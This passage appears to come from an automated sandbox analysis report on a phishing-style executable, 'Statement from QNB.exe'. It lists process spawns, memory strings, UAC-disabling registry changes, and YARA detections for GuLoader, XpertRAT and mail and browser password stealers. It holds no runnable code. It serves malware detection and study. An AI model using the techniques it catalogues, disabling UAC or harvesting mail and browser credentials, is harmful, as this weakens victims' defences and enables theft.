Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
Source: iexplore.exe, 0000000C.00000002.85677855007.0000000003048000.00000004.00000020.sdmp Binary or memory string: H100|0h 0m 0s|1076|Program Manager|108S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.pas28- 405_
Source: iexplore.exe, 0000000C.00000002.85677855007.0000000003048000.00000004.00000020.sdmp Binary or memory string: H100|0h 0m 0s|1076|Program Manager|10illa\sitemanager.xmlI1C4O6V0D4\nyuimqkss4txtkss4.txt">
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: 0|Test - Xpert|United Kingdom|user - 405464|2.10.0|GB|0h 0m 0s|3.0.10|1|-4|0|Program Manager|X||]-[O$
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: D100|0h 0m 0s|1076|Program Manager|2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3Y1-J1N8-O887-M0I1C4O6V0D4.pas
Source: iexplore.exe, iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, iexplore.exe, iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmp, iexplore.exe, 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp Binary or memory string: Progman
Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmp Binary or memory string: 100|0h 0m 0s|1076|Program Manager|15
Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmp, iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: 100|0h 0m 0s|1076|Program Manager|10
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: $100|0h 0m 0s|1076|Program Manager|10 yE971
Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmp Binary or memory string: 100|0h 0m 0s|1076|Program Manager|12
Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, iexplore.exe, 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, iexplore.exe, 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp Binary or memory string: Program ManagerCopyHere
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: Program Manager10 y 4*w
Source: iexplore.exe, 0000000C.00000002.85677305262.0000000002FFF000.00000004.00000020.sdmp Binary or memory string: 0|Test - Xpert|United Kingdom|user - 405464|2.10.0|GB|0h 0m 0s|3.0.10|1|-4|0|Program Manager|X|||x-<O#
Source: iexplore.exe, 0000000C.00000002.85678878066.00000000037E1000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: iexplore.exe, 0000000C.00000002.85678024206.0000000003055000.00000004.00000020.sdmp Binary or memory string: 100|0h 0m 0s|1076|Program Manager|12?
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_0041691B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 17_2_0041691B
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00406B06 GetVersionExA, 14_2_00406B06
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 14_2_00407C79

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Disables user account control notifications
Source: C:\Users\user\Desktop\Statement from QNB.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center Jump to behavior
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Users\user\Desktop\Statement from QNB.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center UACDisableNotify Jump to behavior
Disables UAC (registry)
Source: C:\Users\user\Desktop\Statement from QNB.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Generic Dropper
Source: Yara match File source: 12.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
Yara detected MailPassView
Source: Yara match File source: 16.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.iexplore.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000003.81136331884.0000000005E20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.81127160331.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.81129202432.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81205248968.0000000005DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81103105159.0000000005DD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81120321422.0000000003091000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81102180166.0000000005DA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.81130233674.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000000.81127982382.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81119221282.0000000005DA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81119604744.0000000005DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 3544, type: MEMORYSTR
Yara detected XpertRAT
Source: Yara match File source: 12.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 16_2_00402D9A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 16_2_00402D9A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: ESMTPPassword 16_2_004033D7
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: 12.3.iexplore.exe.5f1a8d8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.iexplore.exe.5f1a8d8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.iexplore.exe.5f1a8d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.iexplore.exe.5f1a8d8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.81146013196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81135483040.0000000005EC5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.81167076673.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.81143708925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.81142234954.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.81144880094.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.81173119870.0000000005F1A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 2448, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected XpertRAT
Source: Yara match File source: 12.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iexplore.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80975835945.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80980312275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80977316956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.80978780847.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Statement from QNB.exe PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: iexplore.exe PID: 1736, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs